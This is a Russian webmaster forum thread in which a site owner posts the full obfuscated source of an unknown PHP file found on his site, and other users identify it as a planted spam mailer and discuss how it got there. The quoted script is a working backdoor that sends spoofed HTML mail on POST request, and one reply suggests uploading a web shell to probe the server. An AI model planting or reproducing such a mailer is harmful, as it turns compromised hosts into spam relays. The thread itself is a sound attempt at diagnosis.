Форум Не про работу Курилка

Левый файл на сайте

kievyes
На сайте с 31.05.2011
Offline
36
kievyes
802

Вчера на одном из своих сайтов нашел такой файл sm3ow2.php со скриптом:

<?php
error_reporting(0); if (!isset($_POST['l']) || !isset($_POST['d'])) die(PHP_OS . "10+" . md5(0987654321)); $v01b6e203 = stripslashes($_POST['l']); $v8d777f38 = stripslashes($_POST['d']); preg_match('|<USER>(.*)</USER>|imsU', $v8d777f38, $vee11cbb1); $vee11cbb1 = $vee11cbb1[1]; preg_match('|<NAME>(.*)</NAME>|imsU', $v8d777f38, $vb068931c); $vb068931c = $vb068931c[1]; preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $v8d777f38, $vc34487c9); $vc34487c9 = $vc34487c9[1]; preg_match('|<SBODY>(.*)</SBODY>|imsU', $v8d777f38, $v6f4b5f42); $v6f4b5f42= $v6f4b5f42[1]; if (ne667da76($_SERVER['SERVER_NAME'])) { $v10497e3f = false; } else { if ($vb068931c != '') $vd98a07f8 = "$vb068931c "; $v0c83f57c = $vee11cbb1 . "@".preg_replace('/^www\./i','',$_SERVER['SERVER_NAME']); $vd98a07f8 .= "<$v0c83f57c>"; $v4340fd73 = "From: $vd98a07f8\r\n"; $v10497e3f = true; } if (((strtolower(@ini_get('safe_mode')) == 'on') || (strtolower(@ini_get('safe_mode')) == 'yes') || (strtolower(@ini_get('safe_mode')) == 'true') || (ini_get("safe_mode") == 1 ))) { $v10497e3f = false; } $v4340fd73 .= "MIME-Version: 1.0\r\n"; $v4340fd73 .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n"; $v4340fd73 .= "Content-Transfer-Encoding: quoted-printable\r\n"; $v6f4b5f42 = na73fa8bd($v6f4b5f42); if ($v10497e3f) { if (mail($v01b6e203, $vc34487c9, $v6f4b5f42, $v4340fd73, "-f$v0c83f57c")) echo "OK" . md5(1234567890); else die(PHP_OS . "20+" . md5(0987654321)); } else { if (mail($v01b6e203, $vc34487c9, $v6f4b5f42, $v4340fd73)) echo "OK" . md5(1234567890); else die(PHP_OS . "20+" . md5(0987654321)); } exit; function ne667da76($v957b527b){ return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b); } function na73fa8bd($vb45cffe0, $v11a95b8a = 0, $v7fa1b685="=\r\n", $v92f21a0f = 0, $v3303c65a = true) { $vf5a8e923 = strlen($vb45cffe0); $vb4a88417 = ''; for($v865c0c0b=0;$v865c0c0b<$vf5a8e923;$v865c0c0b++) { if ($v11a95b8a >= 75) { $v11a95b8a = $v92f21a0f; $vb4a88417 .= $v7fa1b685; } $v4a8a08f0 = ord($vb45cffe0[$v865c0c0b]); if (($v4a8a08f0==0x3d) || ($v4a8a08f0>=0x80) || ($v4a8a08f0<0x20)) { if ((($v4a8a08f0==0x0A) || ($v4a8a08f0==0x0D)) && (!$v3303c65a)) { $vb4a88417.=chr($v4a8a08f0); $v11a95b8a = 0; continue; } $vb4a88417 .='='.str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT); $v11a95b8a += 3; continue; } $vb4a88417 .=chr($v4a8a08f0); $v11a95b8a++; } return $vb4a88417; } ?>

кто не буть встречался с таким вреданосным кодом. И подскажите каким образом его туда могли закинуть. к ФТП и админке доступ только у меня.

LEOnidUKG
На сайте с 25.11.2006
Offline
1753
LEOnidUKG
#1
доступ только у меня.

Вы уверены?)))

Через дырку на сайте, какая CMS?

✅ Мой Телеграм канал по SEO, оптимизации сайтов и серверов: https://t.me/leonidukgLIVE ✅ Качественное и рабочее размещение SEO статей СНГ и Бурж: https://getmanylinks.ru/ ✅ Настройка и оптимизация серверов https://getmanyspeed.ru/
kievyes
На сайте с 31.05.2011
Offline
36
kievyes
#2

сайт самописный мною, дырок как буд-то нет ну только если в админке но она под паролем

artmonster
На сайте с 19.07.2010
Offline
41
artmonster
#3

1. Какой антивирус у Вас стоит?

2. Какие показатели сайта? (посещаемость\PR\ТиЦ)

3. Вариант со взломом движка временно исключим, пока не будет дан ответ на вопрос 2.

Lord Maverik
На сайте с 15.04.2003
Offline
471
Lord Maverik
#4

1. Сайт попал через вас, ищите вирус на компе. Если он не самоликвидировался, всяко бывает :) Или как выше написали через CMS и ее уязвимости.

2. Скорее всего этот файл для спама, через ваш хост.

Lord Maverik добавил 03.11.2011 в 11:42

$v01b6e203 = stripslashes($_POST['l']); 
$v8d777f38 = stripslashes($_POST['d']); 
preg_match('|<USER>(.*)</USER>|imsU', $v8d777f38, $vee11cbb1); 
$vee11cbb1 = $vee11cbb1[1]; 
preg_match('|<NAME>(.*)</NAME>|imsU', $v8d777f38, $vb068931c); 
$vb068931c = $vb068931c[1]; 
preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $v8d777f38, $vc34487c9); 
$vc34487c9 = $vc34487c9[1]; 
preg_match('|<SBODY>(.*)</SBODY>|imsU', $v8d777f38, $v6f4b5f42); 

if (mail($v01b6e203, $vc34487c9, $v6f4b5f42, $v4340fd73, "-f$v0c83f57c")) 
	echo "OK" . md5(1234567890); 
else 
	die(PHP_OS . "20+" . md5(0987654321));

99%, что для спама :)

RedMall.Ru (https://redmall.ru) - Товары из Китая (Таобао, Tmall) с проверкой качества, скидка для форумчан 7% Партнерская программа 2 уровня: 5% + 5%. Подробнее. (https://redmall.ru/about/partner/)
Троян на сайте. Перебор массива (PHP) Yahoo игнорит
kievyes
На сайте с 31.05.2011
Offline
36
kievyes
#5

антивирус касперский - проверял вирусов нет

посещаемость средняя 300 pr1 тиц 10

artmonster
На сайте с 19.07.2010
Offline
41
artmonster
#6
kievyes:
антивирус касперский - проверял вирусов нет
посещаемость средняя 300 pr1 тиц 10

1. Рекомендую обновить базы и сделать полную проверку, потом сменить все пароли фтп.

2. Если вирусов нет всё равно - тут ищите дыры в движке или смежных сайтах. (на одном и том же сервере). Как пример - загрузите себе на сайт шелл и попробуйте попасть в корневую директорию. Если попадаете и видите там другие свои сайты - ищите дыры там. Если попадаете и видите аккаунты других юзеров хостинга - пилите хостера, чтобы закрыл эту огромную дыру, ну это уже вообще будет шок. :)

Помогите найти ошибку Помогите избавиться от фишинг Заразился сайт на joomla
kievyes
На сайте с 31.05.2011
Offline
36
kievyes
#7

Спасибо, буду проверять

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий